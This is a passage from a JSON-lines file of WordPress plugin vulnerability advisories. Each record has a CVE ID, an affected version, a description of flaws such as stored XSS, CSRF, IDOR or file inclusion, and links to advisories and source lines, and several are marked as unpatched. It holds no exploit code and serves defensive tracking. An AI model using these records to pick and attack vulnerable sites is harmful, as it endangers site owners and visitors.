{"CVE_ID":"CVE-2023-2545","slug":"feather-login-page","versionImpact":"1.1.1","description":"The Feather Login Page plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'getListOfUsers' function in versions starting from 1.0.7 up to, and including, 1.1.1. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to access the login links, which can be used for privilege escalation.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b2ab2178-7438-43ef-961e-b54d0d230f4a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b2ab2178-7438-43ef-961e-b54d0d230f4a?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/feather-login-page\\\/trunk\\\/features\\\/inc\\\/admin\\\/expirable-login-link.php?rev=2612332#L85\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/feather-login-page\\\/trunk\\\/features\\\/inc\\\/admin\\\/expirable-login-link.php?rev=2612332#L85\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4783","slug":"magee-shortcodes","versionImpact":"2.1.1","description":"The Magee Shortcodes WordPress plugin through 2.1.1 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/02928db8-ceb3-471a-b626-ca661d073e4f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/02928db8-ceb3-471a-b626-ca661d073e4f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-22305","slug":"kali-forms","versionImpact":"2.3.36","description":"Authorization Bypass Through User-Controlled Key vulnerability in ali Forms Contact Form builder with drag & drop for WordPress \u2013 Kali Forms.This issue affects Contact Form builder with drag & drop for WordPress \u2013 Kali Forms: from n\/a through 2.3.36.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/kali-forms\\\/wordpress-kali-forms-plugin-2-3-38-insecure-direct-object-references-idor-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/kali-forms\\\/wordpress-kali-forms-plugin-2-3-38-insecure-direct-object-references-idor-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1172","slug":"essential-addons-for-elementor-lite","versionImpact":"5.9.8","description":"The Essential Addons for Elementor \u2013 Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Accordion widget in all versions up to, and including, 5.9.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f2ff2cc6-b584-442b-890b-033a0a047c24?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f2ff2cc6-b584-442b-890b-033a0a047c24?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.7\\\/includes\\\/Elements\\\/Adv_Accordion.php#L1292\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.7\\\/includes\\\/Elements\\\/Adv_Accordion.php#L1292\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.7\\\/includes\\\/Elements\\\/Adv_Accordion.php#L1227\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.7\\\/includes\\\/Elements\\\/Adv_Accordion.php#L1227\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3034127%40essential-addons-for-elementor-lite%2Ftrunk&old=3029928%40essential-addons-for-elementor-lite%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3034127%40essential-addons-for-elementor-lite%2Ftrunk&old=3029928%40essential-addons-for-elementor-lite%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5215","slug":"ht-mega-for-elementor","versionImpact":"2.5.5","description":"The HT Mega \u2013 Absolute Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple widgets in all versions up to, and including, 2.5.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86dfdc4f-1cc2-4b0d-b79c-bee3d6956eb4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86dfdc4f-1cc2-4b0d-b79c-bee3d6956eb4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/htmega_videoplayer.php#L520\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/htmega_videoplayer.php#L520\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/htmega_user_login_form.php#L1961\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/htmega_user_login_form.php#L1961\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/htmega_user_register_form.php#L2910\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/htmega_user_register_form.php#L2910\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3106524\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3106524\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ht-mega-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ht-mega-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7817","slug":"misiek-photo-album","versionImpact":"1.4.3","description":"The Misiek Photo Album WordPress plugin through 1.4.3 does not have CSRF checks in some places, which could allow attackers to make logged in users delete arbitrary albums via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ab09e5a3-f5ea-479f-be2d-366f8707775e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ab09e5a3-f5ea-479f-be2d-366f8707775e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-47638","slug":"meeting-scheduler-by-vcita","versionImpact":"4.4.6","description":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in vCita Online Booking & Scheduling Calendar for WordPress by vcita allows Reflected XSS.This issue affects Online Booking & Scheduling Calendar for WordPress by vcita: from n\/a through 4.4.6.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/meeting-scheduler-by-vcita\\\/wordpress-online-booking-scheduling-calendar-for-wordpress-plugin-4-4-6-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/meeting-scheduler-by-vcita\\\/wordpress-online-booking-scheduling-calendar-for-wordpress-plugin-4-4-6-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12523","slug":"ymc-states-map","versionImpact":"2.4.2","description":"The States Map US plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'states_map' shortcode in all versions up to, and including, 2.4.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ymc-states-map\\\/trunk\\\/includes\\\/frontend\\\/Shortcode.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ymc-states-map\\\/trunk\\\/includes\\\/frontend\\\/Shortcode.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ymc-states-map\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ymc-states-map\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bdd07160-721b-4807-a227-72cd91faef39?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bdd07160-721b-4807-a227-72cd91faef39?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12291","slug":"viewmedica","versionImpact":"1.4.15","description":"The ViewMedica 9 plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.4.15. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/viewmedica\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/viewmedica\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/646ba700-28d5-455f-88de-2864ef8f202c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/646ba700-28d5-455f-88de-2864ef8f202c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13222","slug":"user-messages","versionImpact":"1.2.4","description":"The User Messages WordPress plugin through 1.2.4 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/069e1f81-448d-4d27-b288-87111dade2f2\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/069e1f81-448d-4d27-b288-87111dade2f2\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0916","slug":"yaysmtp","description":"The YaySMTP and Email Logs: Amazon SES, SendGrid, Outlook, Mailgun, Brevo, Google and Any SMTP Service plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions 2.4.9 to 2.6.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Note: The vulnerability has been initially patched in version 2.4.8 and was reintroduced in version 2.4.9 with the removal of the wp_kses_post() built-in WordPress sanitization function.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yaysmtp\\\/trunk\\\/includes\\\/Functions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yaysmtp\\\/trunk\\\/includes\\\/Functions.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yaysmtp\\\/trunk\\\/includes\\\/Helper\\\/Utils.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yaysmtp\\\/trunk\\\/includes\\\/Helper\\\/Utils.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3238172\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3238172\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/yaysmtp\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/yaysmtp\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/209019bd-b214-4389-a972-42e38d501203?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/209019bd-b214-4389-a972-42e38d501203?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12815","slug":"point-maker","versionImpact":"0.1.6","description":"The Point Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'point_maker' shortcode in all versions up to, and including, 0.1.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/point-maker\\\/trunk\\\/shortcode.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/point-maker\\\/trunk\\\/shortcode.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/point-maker\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/point-maker\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c4a46d4c-3f03-4d41-8382-b43a02b59cb2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c4a46d4c-3f03-4d41-8382-b43a02b59cb2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2510","slug":"frndzk-expandable-bottom-bar","versionImpact":"1.0","description":"The Frndzk Expandable Bottom Bar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'text' parameter in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/frndzk-expandable-bottom-bar\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/frndzk-expandable-bottom-bar\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4261c81e-13a2-4022-8048-aeb0ea4e9ee4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4261c81e-13a2-4022-8048-aeb0ea4e9ee4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-23677","slug":"gtmetrix-for-wordpress","versionImpact":"0.4.5","description":"Reflected Cross-Site Scripting (XSS) vulnerability in GTmetrix GTmetrix for WordPress plugin <= 0.4.5 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/gtmetrix-for-wordpress\\\/wordpress-gtmetrix-for-wordpress-plugin-0-4-5-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/gtmetrix-for-wordpress\\\/wordpress-gtmetrix-for-wordpress-plugin-0-4-5-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2436","slug":"blog-in-blog","versionImpact":"1.1.1","description":"The Blog-in-Blog plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'blog_in_blog' shortcode in versions up to, and including, 1.1.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with editor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blog-in-blog\\\/tags\\\/1.1.1\\\/blog-in-blog.php#L257\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blog-in-blog\\\/tags\\\/1.1.1\\\/blog-in-blog.php#L257\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5c6a88c3-18b7-470f-8014-373ead66dcfa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5c6a88c3-18b7-470f-8014-373ead66dcfa?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-22304","slug":"freshmail-integration","versionImpact":"2.3.2","description":"Cross-Site Request Forgery (CSRF) vulnerability in Borbis Media FreshMail For WordPress.This issue affects FreshMail For WordPress: from n\/a through 2.3.2.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/freshmail-integration\\\/wordpress-freshmail-for-wordpress-plugin-2-3-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/freshmail-integration\\\/wordpress-freshmail-for-wordpress-plugin-2-3-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1171","slug":"essential-addons-for-elementor-lite","versionImpact":"5.9.8","description":"The Essential Addons for Elementor \u2013 Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Filterable Gallery Widget in all versions up to, and including, 5.9.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fafdd087-9637-41df-bc5a-97e1a02ea744?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fafdd087-9637-41df-bc5a-97e1a02ea744?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034127\\\/essential-addons-for-elementor-lite\\\/trunk\\\/includes\\\/Elements\\\/Filterable_Gallery.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034127\\\/essential-addons-for-elementor-lite\\\/trunk\\\/includes\\\/Elements\\\/Filterable_Gallery.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1348","slug":"auxin-elements","versionImpact":"2.15.5","description":"The Shortcodes and extra features for Phlox theme plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the custom JS parameter in all versions up to, and including, 2.15.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e9324ba-1cbf-4326-80b5-7b9d969441ad?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e9324ba-1cbf-4326-80b5-7b9d969441ad?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auxin-elements\\\/trunk\\\/includes\\\/general-hooks.php#L1928\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auxin-elements\\\/trunk\\\/includes\\\/general-hooks.php#L1928\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4780","slug":"image-hover-effects-addon-for-elementor","versionImpact":"1.4.3","description":"The Image Hover Effects \u2013 Elementor Addon plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018eihe_link\u2019 parameter in all versions up to, and including, 1.4.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/637972a3-1936-4add-88a2-3fbafba4b5c8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/637972a3-1936-4add-88a2-3fbafba4b5c8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-hover-effects-addon-for-elementor\\\/tags\\\/1.4.3\\\/includes\\\/widgets.php#L529\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-hover-effects-addon-for-elementor\\\/tags\\\/1.4.3\\\/includes\\\/widgets.php#L529\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3117113\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3117113\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/image-hover-effects-addon-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/image-hover-effects-addon-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7816","slug":"gixaw-chat","versionImpact":"1.0","description":"The Gixaw Chat WordPress plugin through 1.0 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f610c4a5-ccde-4305-93e0-3c6f50c741ee\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f610c4a5-ccde-4305-93e0-3c6f50c741ee\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-44018","slug":"instant-chat-wp","versionImpact":"1.0.5","description":"Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Istmo Plugins Instant Chat Floating Button for WordPress Websites allows PHP Local File Inclusion.This issue affects Instant Chat Floating Button for WordPress Websites: from n\/a through 1.0.5.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/instant-chat-wp\\\/wordpress-instant-chat-wp-plugin-1-0-5-local-file-inclusion-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/instant-chat-wp\\\/wordpress-instant-chat-wp-plugin-1-0-5-local-file-inclusion-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12517","slug":"woo-cart-count-shortcode","versionImpact":"1.0.4","description":"The WooCommerce Cart Count Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'cart_button' shortcode in all versions up to, and including, 1.0.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-cart-count-shortcode\\\/trunk\\\/woocommerce-cart-count-shortcode.php#L79\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-cart-count-shortcode\\\/trunk\\\/woocommerce-cart-count-shortcode.php#L79\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8373938c-060a-4579-a133-d25b4d065d36?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8373938c-060a-4579-a133-d25b4d065d36?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12290","slug":"infility-global","versionImpact":"2.9.8","description":"The Infility Global plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018set_type\u2019 parameter in all versions up to, and including, 2.9.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/infility-global\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/infility-global\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6127576b-5ce2-4a3e-95de-8a2b3d90d3a0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6127576b-5ce2-4a3e-95de-8a2b3d90d3a0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13221","slug":"fantastic-elasticsearch","versionImpact":"4.1.0","description":"The Fantastic ElasticSearch WordPress plugin through 4.1.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/693f4cc4-a082-46bc-abc9-a08919f70157\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/693f4cc4-a082-46bc-abc9-a08919f70157\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11731","slug":"master-slider","versionImpact":"3.10.6","description":"The Master Slider \u2013 Responsive Touch Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's ms_slider shortcode in all versions up to, and including, 3.10.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected 